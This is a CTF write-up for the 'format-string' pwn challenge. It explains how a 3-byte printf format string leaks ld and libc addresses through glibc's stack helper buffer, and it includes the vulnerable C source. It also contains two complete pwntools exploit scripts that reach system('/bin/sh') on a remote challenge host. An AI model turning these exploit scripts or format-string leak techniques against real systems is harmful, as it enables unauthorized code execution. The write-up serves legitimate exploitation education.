format-string

Introduction

format-string was the easy pwn challenge from this CTF, which I unfortunately only managed to solve an hour after the CTF concluded, because I was focused on another pwn challenge, corchat_v3. While the description claims you'll learn nothing, I would argue that the mechanisms that make this challenge solvable at all are interesting, even if they rely on a fair bit of luck.

Reversing

Running pwn checksec reveals we have maximum protections (minus FORTIFY).

We're also given the source code and, given the name of the challenge, it's easy to spot that the problem here is a printf format string vulnerability in the aptly-named do_printf.

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

void do_printf()
{
    char buf[4];

    if (scanf("%3s", buf) <= 0)
        exit(1);

    printf("Here: ");
    printf(buf);
}

void do_call()
{
    void (*ptr)(const char *);

    if (scanf("%p", &ptr) <= 0)
        exit(1);

    ptr("/bin/sh");
}

int main()
{
    int choice;

    setvbuf(stdin, 0, 2, 0);
    setvbuf(stdout, 0, 2, 0);

    while (1)
    {
        puts("1. printf");
        puts("2. call");

        if (scanf("%d", &choice) <= 0)
            break;

        switch (choice)
        {
            case 1:
                do_printf();
                break;
            case 2:
                do_call();
                break;
            default:
                puts("Invalid choice!");
                exit(1);
        }
    }

    return 0;
}

do_printf

It uses scanf("%3s", buf) to read in the format string, meaning we only have a maximum of 3 characters (plus a null byte) to construct a format string. This is barely enough to do anything meaningful, and immediately rules out anything like %n overwrites or %[num]$p leaks.
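To make the size limit concrete, here is a minimal sketch that models what scanf("%3s", buf) keeps from a line of input. The helper name scanf_3s and the sample payloads are mine, and the model only covers the width limit and whitespace handling:

```python
import string

# Bytes that scanf treats as whitespace in the C locale.
WHITESPACE = string.whitespace.encode()

def scanf_3s(data: bytes) -> bytes:
    """Model scanf("%3s"): skip leading whitespace, keep at most 3 non-whitespace bytes."""
    data = data.lstrip(WHITESPACE)
    token = bytearray()
    for byte in data:
        if byte in WHITESPACE or len(token) == 3:
            break
        token.append(byte)
    return bytes(token)

# Two- and three-character payloads survive; positional ones get cut off.
for payload in [b"%p", b"%*x", b"%sX", b"%1$p", b"%7$n"]:
    kept = scanf_3s(payload + b"\n")
    status = "intact" if kept == payload else "truncated"
    print(payload, "->", kept, status)
```

Anything of the form %[num]$p needs at least four characters, which is why positional leaks are off the table.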

do_call

We also have do_call, which prompts us for the memory address of a function to call with /bin/sh. The obvious idea here is to use system, and we get our shell, but for that we'd need a libc leak.

So the plan would seem obvious:

  1. Use do_printf to leak libc

  2. Use do_call to get a shell

Leaking libc

So with the size restriction of 3 characters, what do we have available?

  • We only have enough room for 1 format specifier

  • Any of the regular specifiers of the form: %[specifier] (here's a list of specifiers)

  • We can pad specifiers: %[0-9][specifier]

  • We can use variable width specifiers: %*[specifier]

The description tells us that it's a common specifier, so let's try %p:

%p (and most specifiers that we can use) will access the first argument (besides the format string), so it looks at rsi. In our case, it just so happens that rsi is set to some stack address after the first printf("Here: "), which also interestingly points to the string Here: (I'm sure that won't be significant later).

So we can get a stack leak at the very least, but this doesn't help much. NX is enabled, so we can't jump to the stack, but even if we could, we'd struggle to write any shellcode due to the small buffer size.

Many of the remaining specifiers aren't very useful either, as most of them would be different ways of printing integers, so they'd only print that stack address back to us, but just in different forms. %s doesn't seem that useful at first either, as it would just print Here: back to us.

Floating point?

One idea I had however was floating point specifiers like %f. The reason these are interesting is because they would access different arguments, as in, they wouldn't use rsi. To see this, let's have a closer look at printf:

int
__printf (const char *format, ...)
{
  va_list arg;
  int done;

  va_start (arg, format);
  done = __vfprintf_internal (stdout, format, arg, 0);
  va_end (arg);

  return done;
}

Not much to see here, except for the use of variadic arguments via va_list. You'll probably be familiar with the fact that va_list allows for an arbitrary number of arguments. It stores the argument registers, plus a pointer to the stack arguments. But it doesn't just store the general purpose (gp) registers (rdi, rsi, rdx, rcx, r8, r9), it can also store the floating point (fp) registers (xmm0-7):
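As a rough illustration of why an integer specifier and a floating point specifier read from different places, here is a small Python model of the System V x86-64 va_list layout (48 bytes of saved gp registers followed by eight 16-byte xmm slots). The class and method names are mine, and this is a simplified sketch, not glibc's code:

```python
import struct

GP_AREA = 6 * 8                  # rdi, rsi, rdx, rcx, r8, r9
FP_AREA = 8 * 16                 # xmm0..xmm7, 16 bytes per slot
SAVE_AREA_SIZE = GP_AREA + FP_AREA

class VaList:
    """Simplified model of va_list for a call like printf(format, ...)."""

    def __init__(self, reg_save_area: bytes, overflow_args: bytes, named_gp: int = 1):
        assert len(reg_save_area) == SAVE_AREA_SIZE
        self.reg_save_area = reg_save_area
        self.overflow = overflow_args
        self.gp_offset = 8 * named_gp   # the format string already consumed rdi
        self.fp_offset = GP_AREA        # no named floating point arguments
        self.overflow_pos = 0

    def _from_stack(self) -> bytes:
        chunk = self.overflow[self.overflow_pos:self.overflow_pos + 8]
        self.overflow_pos += 8
        return chunk

    def next_int(self) -> int:
        """What %p, %d, %s and friends consume: the next gp slot, then the stack."""
        if self.gp_offset < GP_AREA:
            raw = self.reg_save_area[self.gp_offset:self.gp_offset + 8]
            self.gp_offset += 8
        else:
            raw = self._from_stack()
        return struct.unpack("<Q", raw)[0]

    def next_double(self) -> float:
        """What %f consumes: the low 8 bytes of the next xmm slot, then the stack."""
        if self.fp_offset < SAVE_AREA_SIZE:
            raw = self.reg_save_area[self.fp_offset:self.fp_offset + 8]
            self.fp_offset += 16
        else:
            raw = self._from_stack()
        return struct.unpack("<d", raw)[0]

def demo():
    # Hypothetical register contents: rsi holds a stack address, xmm0 holds 1.5.
    gp = struct.pack("<6Q", 0, 0x7FFC0000BEE0, 2, 3, 4, 5)
    fp = struct.pack("<d", 1.5) + bytes(FP_AREA - 8)
    args = VaList(gp + fp, overflow_args=b"")
    return args.next_int(), args.next_double()

print(demo())
```

The two cursors advance independently, so a single %f skips rsi entirely and goes straight to the xmm0 slot.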

Here we see that the fp registers can be saved to [rsp+0x50] if al != 0, because in a call to a variadic function, al contains the number of fp registers used as arguments, so if any fp registers are used, we should save them.

Since the program doesn't use floating point arguments, it sets al to 0 both times, which means that section of memory is left uninitialised, and if we're lucky, could have a libc address.

And it seems like we may have been lucky? If we can use a floating point specifier which can cover the full 16 bytes, we may be able to leak it as a floating point number, then convert it back. Unfortunately there is no such specifier.
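For reference, converting between a printed double and the raw 8 bytes behind it could look like the sketch below. The pointer value is hypothetical. One thing it shows is that a user-space pointer reinterpreted as a double has all-zero exponent bits, so it is a subnormal number and a fixed six-digit %f rendering would not preserve it:

```python
import struct
import sys

def bits_to_double(raw: int) -> float:
    """Reinterpret a 64-bit integer as an IEEE 754 double."""
    return struct.unpack("<d", struct.pack("<Q", raw))[0]

def double_to_bits(value: float) -> int:
    """Reinterpret a double as its 64-bit integer pattern."""
    return struct.unpack("<Q", struct.pack("<d", value))[0]

pointer = 0x00007F1122334455            # hypothetical libc-style address
as_double = bits_to_double(pointer)

print(as_double < sys.float_info.min)   # smaller than the smallest normal double
print("%f" % as_double)                 # default precision loses every bit
print(as_double.hex())                  # a hex float rendering keeps them
print(hex(double_to_bits(as_double)))   # round trip back to the pointer
```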

In printf, %f and %lf both read a double (64 bits), since float arguments are promoted to double in variadic calls, so neither is enough to cover it. While there is %Lf, which is for a long double, on x86 this only covers 80 bits, not 128. Also, it seems that these long double arguments are passed on the stack, so it won't be accessing [rsp+0x50] anyway; it'll instead use the stack arguments (which overlap with the do_printf buffer), which are useless for us:

%s

It turns out that the description wasn't lying when it said it was a widely used specifier (shocker). But doesn't %s just leak the string Here: ?

Well, my teammate ir0nstone found something interesting that happens when you do %p then %s:

The second output (from %s) now contains the tail end of the %p output, which is quite interesting. It implies that rsi points to some internal stack buffer that the output gets copied to.

So what if you now do %s followed by some character? In theory, this could append the character to the buffer, as it would output the current buffer plus an extra character, all of which must be copied back into this buffer.

And sure enough this works! Now if this is just some stack buffer, there could be uninitialised stack data inside it, which we could pad up to and print back to us. We can verify this with the following script:

from pwn import *

e = context.binary = ELF('chal_patched')

send_choice = lambda c: p.sendlineafter(b"2. call\n", str(c).encode())
def printf(fmt):
	send_choice(1)
	p.sendline(fmt.encode())
	p.recvuntil(b"Here: ")
	return p.recvuntil(b"1. printf", drop=True)

p = e.process()

l = log.progress("")
buf = b"Here: "
for i in range(0x2000):
	l.status(f"{i}/{0x2000}")
	out = printf("%sX")
	if out != buf + b"X"*(i+1):
		break
l.success(f"Found at {i}!")

print(out)
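The behaviour that script probes can also be modelled offline. The sketch below is a toy model under my own assumptions: a zeroed stack buffer with one stale pointer planted at a hypothetical offset, and a do_printf that only understands %s. It is not the real glibc logic, but it shows why repeating %sX eventually prints the stale bytes:

```python
import struct

BUFSIZ = 8192          # buffer size used by this model (an assumption)
PREFIX = b"Here: "

def cstring(buf: bytearray) -> bytes:
    """Bytes up to (not including) the first NUL, as %s would read them."""
    end = buf.find(b"\x00")
    return bytes(buf) if end < 0 else bytes(buf[:end])

def do_printf(buf: bytearray, fmt: bytes) -> bytes:
    """Model one do_printf call; only the %s conversion is handled."""
    buf[:len(PREFIX)] = PREFIX               # printf("Here: ") fills the buffer start
    out = fmt.replace(b"%s", cstring(buf))   # printf(buf) with rsi pointing at the buffer
    buf[:len(out)] = out                     # output lands in the buffer, no NUL appended
    return out

def find_leak(buf: bytearray):
    """Repeat %sX until the output is no longer just padding."""
    for i in range(len(buf)):
        out = do_printf(buf, b"%sX")
        if out != PREFIX + b"X" * (i + 1):
            return i, out
    raise RuntimeError("no stale data found")

stale_ptr = 0x00007F1122334455               # hypothetical leftover pointer
stack = bytearray(BUFSIZ)
stack[0x40:0x48] = struct.pack("<Q", stale_ptr)

i, out = find_leak(stack)
leak = struct.unpack("<Q", out[0x40:0x46] + b"\x00\x00")[0]
print(i, hex(leak))
```

Each call overwrites the previous terminator with an X, so the string grows by one byte per iteration until it runs into non-zero stale data.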

Hang on, what?

This is some weird behaviour, and seems quite lucky for us (which it is). Understandably I had questions.

The buffer

First of all, what is this stack buffer? And also why is there a buffer at all, isn't stdout supposed to be unbuffered?

To answer these, let's look further into printf. We saw that it calls vfprintf, so let's start there.

It starts off by doing some sanity checks, but then checks if the file is unbuffered, and if it is, it will call buffered_vfprintf:

It seems that when the file is unbuffered, it creates a "helper file" on the stack that uses a stack buffer, and then it prints to the "helper file". This seems like such a hack (cos it is), but thankfully it helps us out, because CHAR_T buf[BUFSIZ] is where the output goes before it's written out.

Why in rsi?

After it gets printed to the "helper file", the output sits in the stack buffer, and now needs to be written out to stdout. It does this by calling _IO_sputn, which goes on to call the write syscall in _IO_new_file_write.

This is where rsi would be set to the buffer, and from this point the rsi register remains untouched. The main reason for this is the fact that no function calls (with 2+ arguments) take place after this, so it never gets clobbered.

However there is still an element of "luck", because rdi is clobbered by _IO_funlockfile (see here), and rdx gets clobbered as a scratch register.

ld leak to libc leak

In my solution I used the first address I found (the one found by the script) for my leak. Unfortunately this address was an ld address (_dl_process_pt_note+539), not libc. However, due to how the libraries are mapped, for each system the offsets between the libraries are deterministic, so we can convert this into a libc leak.

The offset for my system was 0x1f4000, but remotely I had to fiddle a bit to find that it was 0x1f6000 (not the cleanest way to do it, but oh well).
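The "fiddling" can be made a little more systematic. A minimal sketch, assuming the gap between the two mappings only shifts by whole pages: the helper names, the example base and the leak offset are all hypothetical, while 0x1f4000 and 0x1f6000 are the values from above.

```python
PAGE = 0x1000

def ld_base_from_leak(leak: int, leak_offset_in_ld: int) -> int:
    """Subtract the leaked symbol's offset and sanity-check page alignment."""
    base = leak - leak_offset_in_ld
    if base % PAGE:
        raise ValueError("base is not page aligned; the offset is probably wrong")
    return base

def candidate_libc_bases(ld_base: int, local_gap: int, max_pages: int = 4):
    """libc base guesses for gaps within max_pages pages of the local one."""
    return [ld_base - (local_gap + k * PAGE) for k in range(-max_pages, max_pages + 1)]

# Hypothetical numbers purely for illustration.
ld_base = 0x7F0000200000
leak = ld_base + 0x1A21B
assert ld_base_from_leak(leak, 0x1A21B) == ld_base

for guess in candidate_libc_bases(ld_base, 0x1F4000):
    print(hex(guess))
```

Each guess can then be tried against the remote in turn until system is actually reached.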

Solution

Armed with a libc leak, we can now call do_call and get RCE.

#!/usr/bin/python3
from pwn import *

e = context.binary = ELF('chal_patched')
libc = ELF('libc-2.31.so', checksec=False)
ld = ELF('ld-2.31.so', checksec=False)
if args.REMOTE:
	ip, port = "be.ax", 32323
	conn = lambda: remote(ip, port)
	LIBC_TO_LD = 0x1f4000 + 0x1000*(2)
else:
	conn = lambda: e.process()
	LIBC_TO_LD = 0x1f4000

send_choice = lambda c: p.sendlineafter(b"2. call\n", str(c).encode())

def printf(fmt):
	send_choice(1)
	p.sendline(fmt.encode())
	p.recvuntil(b"Here: ")
	return p.recvuntil(b"1. printf", drop=True)

def call(func):
	send_choice(2)
	p.sendline(hex(func).encode())

p = conn()

leak_off = 0x1248
delim = b"Here: ".ljust(leak_off, b"X")

# send all this in one go to speed up remote
p.send(b"1\n%sX\n" * (leak_off - len("Here: ")))
p.recvuntil(delim)

ld_leak = u64(printf("%sX")[leak_off:leak_off+6] + b"\x00\x00")
log.info(f"ld_leak: {hex(ld_leak)}")

ld.address = ld_leak - (ld.sym._dl_process_pt_note+539)
log.info(f"ld: {hex(ld.address)}")

libc.address = ld.address - LIBC_TO_LD
log.info(f"libc: {hex(libc.address)}")

call(libc.sym.system)
p.interactive()
# corctf{w4CKy_$tr1NG-f0rm4T!}

Alternative Solution

The above is my solution, but there was another approach that was shared on the Discord after the event finished, which involved the variable width specifier: %*x.

The variable width specifier allows the user to specify the width for an argument as an argument:

#include <stdio.h>

int main() {
    printf("|%*d|\n", 10, 69);
    printf("|%*d|\n", -10, 69);
}

/*
OUTPUT:
|        69|
|69        |
*/

This can be useful in some printf exploits using %n, as you can use the lower 32 bits of an address as a width, and print a variable number of bytes depending on that address (here's an example).

In our case, however, it would use rsi as a width and, since that's an address, it will print a lot of bytes (most of which are spaces). This is useful because this amount of printing will fill up the buffer, and then when another function is called (like scanf), it will clobber the stack buffer with its stack usage, leaving behind addresses. Now the buffer has spaces padding up to some address, which in our case happens to be _IO_2_1_stdin_, which we can print.
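How many bytes get printed depends on how the address is read as an int. A small sketch, assuming the width is taken from the lower 32 bits of rsi as a signed int and that a negative width just means left-justification with the absolute value (the function names and sample addresses are mine):

```python
def printf_int_arg(register: int) -> int:
    """Lower 32 bits of a 64-bit register, interpreted as a signed int."""
    low = register & 0xFFFFFFFF
    return low - (1 << 32) if low & 0x80000000 else low

def star_width(register: int) -> int:
    """Field width %*x would use: the absolute value of that int."""
    return abs(printf_int_arg(register))

MAX_WIDTH = 2 * (1 << 28)   # the local threshold used in the exploit script

# Hypothetical stack addresses from two different runs.
for rsi in (0x7FFD1234ABCD, 0x7FFDF234ABCD):
    width = star_width(rsi)
    print(hex(rsi), printf_int_arg(rsi), width, width <= MAX_WIDTH)
```

Because ASLR changes those lower bits on every run, reconnecting until the width is small keeps the amount of output manageable.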

Below is my implementation of this solution (I opted to find a process with a low width, so that the exploit would run quicker remotely).

#!/usr/bin/python3
from pwn import *

e = context.binary = ELF('chal_patched')
libc = ELF('libc-2.31.so', checksec=False)
ld = ELF('ld-2.31.so', checksec=False)
if args.REMOTE:
	ip, port = "be.ax", 32323
	conn = lambda: remote(ip, port, level="error")
	MAX_WIDTH = 1*(1<<28)
else:
	conn = lambda: e.process(level="error")
	MAX_WIDTH = 2*(1<<28)

send_choice = lambda c: p.sendlineafter(b"2. call\n", str(c).encode())

def printf(fmt):
	send_choice(1)
	p.sendline(fmt.encode())
	p.recvuntil(b"Here: ")
	return p.recvuntil(b"1. printf", drop=True)

def call(func):
	send_choice(2)
	p.sendline(hex(func).encode())

# find a process with a low width
while True:
	p = conn()

	width = abs(int(printf("%d")))
	log.info(f"width: {hex(width)}")
	if width <= MAX_WIDTH:
		break
	p.close()

l = log.progress("filling buffer")
# fill buffer
printf("%*x")
l.success("done")

libc_leak = u64(printf("%s")[-6:] + b"\x00\x00")
log.info(f"libc leak: {hex(libc_leak)}")

libc.address = libc_leak - libc.sym._IO_2_1_stdin_
log.info(f"libc: {hex(libc.address)}")

call(libc.sym.system)
p.interactive()
# corctf{w4CKy_$tr1NG-f0rm4T!}
